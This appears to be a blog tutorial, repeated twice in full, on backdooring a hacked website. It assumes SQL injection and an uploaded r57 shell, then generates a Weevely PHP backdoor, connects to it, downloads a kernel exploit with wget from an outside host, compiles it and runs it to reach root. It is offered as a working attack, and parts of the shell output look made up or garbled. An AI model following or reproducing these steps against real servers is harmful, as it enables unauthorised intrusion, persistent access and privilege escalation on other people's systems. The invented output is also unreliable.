Assalam O Alaikum All!!
Today Im going to post a tutorial Related to Backdoor Via Backtrack 5.
Now For this You need A Virtual Machine Install with Bt5.
oK.. NoW LeTs Start..
Assume our target site : http://target.com/
Now we have hacked admin panel of site via sql injection. The site was sql vulnerable (Assumption)
Admin pAnel: http://target.com/admin/index.php
After logging into the admin panel we have uploaded our shell (r57.php)
shell location on server: http://target.com/uploads/r57.php
now..
Run you Vmware >> Backtrack 5...
The game starts now..
Backdooring a server with encrypted php backdoor.. amazing!!
root@bt:~#
root@bt:~# cd /pentest/backdoors/web/weevely
Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
Where
-p = your password to access the backdoor
-g = generate a new encrypted php file (it doesn’t actually encrypt the file, they encode it)
-o = specify your output file
root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o /root/Desktop/bdoor.php -p rustles
+ Backdoor file ‘bdoor.php ’ created with password ‘rustles".Now go and check your desktop. There will be a encrypted php file bdoor.php .
=>FireFox ---> http://target.com/uploads/r57.php ---> Upload bdoor.php
=>FireFox ---> http://target.com/uploads/bdoor.php ---> bdoor.php location
Now we have to connect to our encrypted bdoor.php
root@bt:/pentest/backdoors/web/weevely# ./main.py -t - u http://target.com/uploads/bdoor.php -p rustles
Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
+ Using method ‘system()’.
+ Retrieving terminal basic environment variables .
[hacker@target.com/] ls
Index.php
admin
uploads
images
config.php
contact.php
Director listing Successful.
[hacker@target.com/] mkdir tmp
Directory tmp successfully created!!
[hacker@target.com/] cd tmp
[hacker@target.com/tmp] mkdir pcp
Directory pcp Successfully Created.
[hacker@target.com/tmp] cd pcp
[hacker@target.com/tmp/pcp] uname -r / -a
Linux 2.6.32 kernel (Assume)
[hacker@target.com/tmp/pcp]wget http://expoit-2.6.32.com/2.6.32.c
Downloading 2.6.32.c
File Transfer Complete -----------------100% ---------- 2.6.32.c
[hacker@target.com/tmp/pcp] ls
2.6.32.c
Directory Successfully listed.
[hacker@target.com/tmp/pcp] gcc 2.6.32.c -o hackall
-
-
done
[hacker@target.com/tmp/pcp] ./hackall
-
-
[hacker@target.com/tmp/pcp] id
uid=(root) gid=(root)
[hacker@target.com/tmp/pcp] Rooted ... Enjoy!!
Today Im going to post a tutorial Related to Backdoor Via Backtrack 5.
Now For this You need A Virtual Machine Install with Bt5.
oK.. NoW LeTs Start..
Assume our target site : http://target.com/
Now we have hacked admin panel of site via sql injection. The site was sql vulnerable (Assumption)
Admin pAnel: http://target.com/admin/index.php
After logging into the admin panel we have uploaded our shell (r57.php)
shell location on server: http://target.com/uploads/r57.php
now..
Run you Vmware >> Backtrack 5...
The game starts now..
Backdooring a server with encrypted php backdoor.. amazing!!
root@bt:~#
root@bt:~# cd /pentest/backdoors/web/weevely
Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
Where
-p = your password to access the backdoor
-g = generate a new encrypted php file (it doesn’t actually encrypt the file, they encode it)
-o = specify your output file
root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o /root/Desktop/bdoor.php -p rustles
+ Backdoor file ‘bdoor.php ’ created with password ‘rustles".Now go and check your desktop. There will be a encrypted php file bdoor.php .
=>FireFox ---> http://target.com/uploads/r57.php ---> Upload bdoor.php
=>FireFox ---> http://target.com/uploads/bdoor.php ---> bdoor.php location
Now we have to connect to our encrypted bdoor.php
root@bt:/pentest/backdoors/web/weevely# ./main.py -t - u http://target.com/uploads/bdoor.php -p rustles
Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
+ Using method ‘system()’.
+ Retrieving terminal basic environment variables .
[hacker@target.com/] ls
Index.php
admin
uploads
images
config.php
contact.php
Director listing Successful.
[hacker@target.com/] mkdir tmp
Directory tmp successfully created!!
[hacker@target.com/] cd tmp
[hacker@target.com/tmp] mkdir pcp
Directory pcp Successfully Created.
[hacker@target.com/tmp] cd pcp
[hacker@target.com/tmp/pcp] uname -r / -a
Linux 2.6.32 kernel (Assume)
[hacker@target.com/tmp/pcp]wget http://expoit-2.6.32.com/2.6.32.c
Downloading 2.6.32.c
File Transfer Complete -----------------100% ---------- 2.6.32.c
[hacker@target.com/tmp/pcp] ls
2.6.32.c
Directory Successfully listed.
[hacker@target.com/tmp/pcp] gcc 2.6.32.c -o hackall
-
-
done
[hacker@target.com/tmp/pcp] ./hackall
-
-
[hacker@target.com/tmp/pcp] id
uid=(root) gid=(root)
[hacker@target.com/tmp/pcp]
Rooted ... Enjoy!!Special Thnx to Hack All
No comments:
Post a Comment